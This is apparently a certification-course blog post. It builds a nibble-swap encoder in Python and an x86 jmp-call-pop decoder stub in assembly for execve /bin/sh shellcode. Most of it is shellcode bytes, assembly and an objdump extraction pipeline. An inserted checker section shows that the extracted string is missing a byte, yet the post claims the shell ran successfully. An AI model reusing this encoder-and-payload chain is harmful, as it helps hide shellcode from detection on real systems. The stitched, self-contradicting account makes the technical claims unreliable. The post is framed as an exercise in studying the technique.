
SLAEx86 - Assignment 4

The fourth assignment for the SLAEx86 certification includes the following requirements:

  • Create a custom encoding scheme like the “Insertion Encoder” we showed you
  • POC with using execve-stack as the shellcode to encode with your schema and execute

Seems like a fun exercise with some challenge and creativity. Let’s give it a try …

After going through the course material and reading the requirements of this assignment, it was apparent that I would need to do this in two parts. First, I would create a Python script to do the encoding of the execve-stack /bin/sh shellcode and then write a complementary decoder in assembly.

Step 1: Python Encoder

For the encoding scheme, I decided to do a ‘swap-byte encoder’ to encode the execve-stack shellcode. My thought was to take each byte of shellcode and swap its two nibbles (ex: 0x31 –> 0x13). This was completed by writing the following Python script:

#!/usr/bin/python

# Python Swap-Byte Encoder
# Example - \x01 --> \x10

# Load shellcode
# SLAEx86 execve-stack shellcode used in example ("/bin/sh")
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

src = bytearray(shellcode)

# Convert the raw bytes into one continuous hex string (two hex digits per byte)

sc_string = ""

for x in src:
    sc_string += '%02x' % x

# Swap the two hex digits (nibbles) of every byte and build the encoded
# shellcode in both output formats (\x.. for C, 0x.. for nasm db)

encoded1 = ""
encoded2 = ""

print('Encoded shellcode ...' + '\n')

for x in range(0, len(sc_string) - 1, 2):
    y = sc_string[x + 1] + sc_string[x]
    encoded1 += '\\x' + y
    encoded2 += '0x' + y + ','

print(encoded1 + '\n')

print(encoded2 + '\n')

print('Len: %d' % len(src))

Running the Python script produced the following output:

[email protected]:~/Desktop/Assembly/SLAE_Exam/Assignment4$ ./swapbyte-encoder.py
Encoded shellcode ...

\x13\x0c\x05\x86\xf2\xf2\x37\x86\x86\xf2\x26\x96\xe6\x98\x3e\x05\x98\x2e\x35\x98\x1e\x0b\xb0\xdc\x08

0x13,0x0c,0x05,0x86,0xf2,0xf2,0x37,0x86,0x86,0xf2,0x26,0x96,0xe6,0x98,0x3e,0x05,0x98,0x2e,0x35,0x98,0x1e,0x0b,0xb0,0xdc,0x08,

Len: 25

Step 2: Decode the Shellcode in Assembly

After obtaining the swap-byte encoded shellcode I used the jmp-call-pop technique to write the assembly to do the proper decoding:

global _start

section .text
_start:

        jmp short call_decoder

decoder:
        pop esi                 ; ESI -> first byte of EncodedShellcode (return address pushed by call)
        xor ecx, ecx
        mov cl, 25              ; Place encoded shellcode length here

decode:
        ror byte [esi], 4       ; rotate the byte right by 4 bits, swapping its nibbles back
        inc esi                 ; increment the ESI position
        loop decode             ; repeat until ECX reaches zero

        jmp short EncodedShellcode ; payload is now decoded in place, run it

call_decoder:
        call decoder
        EncodedShellcode: db 0x13,0x0c,0x05,0x86,0xf2,0xf2,0x37,0x86,0x86,0xf2,0x26,0x96,0xe6,0x98,0x3e,0x05,0x98,0x2e,0x35,0x98,0x1e,0x0b,0xb0,0xdc,0x08

After a successful compilation I used the command-linefu objdump command to extract the shellcode:

[email protected]:~/Desktop/Assembly/SLAE_Exam/Assignment4$ objdump -d ./swapbyte-decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x0d\x5e\x31\xc9\xb1\x19\xc0\x0e\x04\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x13\x0c\x05\x86\xf2\xf2\x86\x86\xf2\x26\x96\xe6\x98\x3e\x05\x98\x2e\x35\x98\x1e\x0b\xb0\xdc\x08"
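As an added example (not code from the original post), the script below reimplements the nibble swap in Python 3, models the decoder's `ror byte [esi], 4` loop as an 8-bit rotate, and checks an extracted "\xNN" string against the original execve-stack bytes. Because `cut -f1-6` keeps at most six bytes per objdump line, any seven-byte instruction that objdump forms from the encoded data loses its last byte, and a length mismatch from `check_extracted` is the quickest way to catch that. The 20-byte decoder stub constant is taken from the objdump output above; everything after it is assumed to be the payload.

```python
#!/usr/bin/env python3
# Added example, not code from the original post: the nibble-swap encoder,
# a Python model of the decoder's "ror byte [esi], 4" loop, and a length
# check for the "\xNN" blob that the objdump one-liner produces.

# SLAEx86 execve-stack shellcode (the same bytes the post encodes)
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

# The 20-byte decoder stub exactly as objdump emits it (jmp, pop esi,
# xor ecx, mov cl, ror, inc esi, loop, jmp, call); the payload follows it.
STUB = bytes.fromhex("eb0d5e31c9b119c00e0446e2faeb05e8eeffffff")

def swap_nibbles(data: bytes) -> bytes:
    """Encoder: swap the high and low nibble of every byte (0x31 -> 0x13)."""
    return bytes(((b & 0x0F) << 4) | (b >> 4) for b in data)

def ror8(value: int, count: int) -> int:
    """8-bit rotate right, the per-byte operation the decoder performs."""
    count %= 8
    return ((value >> count) | (value << (8 - count))) & 0xFF

def ror4_decode(data: bytes) -> bytes:
    """Decoder model: ror by 4 is its own inverse, so this undoes the encoder."""
    return bytes(ror8(b, 4) for b in data)

def parse_cstring(blob: str) -> bytes:
    """Turn a "\\xeb\\x0d..." C string literal back into raw bytes."""
    return bytes.fromhex(blob.strip().strip('"').replace("\\x", ""))

def check_extracted(blob: str, original: bytes) -> dict:
    """Compare an extracted stub+payload blob with the original shellcode.
    A short blob means the pipeline dropped bytes (cut -f1-6 keeps six per
    objdump line) and the payload will not decode."""
    raw = parse_cstring(blob)
    return {
        "expected_len": len(STUB) + len(original),
        "actual_len": len(raw),
        "stub_ok": raw.startswith(STUB),
        "has_nulls": b"\x00" in raw,
        "decodes_ok": ror4_decode(raw[len(STUB):]) == original,
    }

if __name__ == "__main__":
    enc = swap_nibbles(SHELLCODE)
    print("".join("\\x%02x" % b for b in enc))
    print(check_extracted("".join("\\x%02x" % b for b in STUB + enc), SHELLCODE))
```

Feeding the 44-byte string from the objdump run above into `check_extracted` reports an expected length of 45 and `decodes_ok: False`, which is the signal to re-extract the payload rather than trust the cut output.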

Step 3: Get a /bin/sh Shell

Using the C shell program I placed the extracted shellcode from the swapbyte-decoder.nasm file to compile and execute it to obtain a /bin/sh shell:

Success! There is now a working swap-byte encoder and a swap-byte decoder that is able to execute using the outputted shellcode!
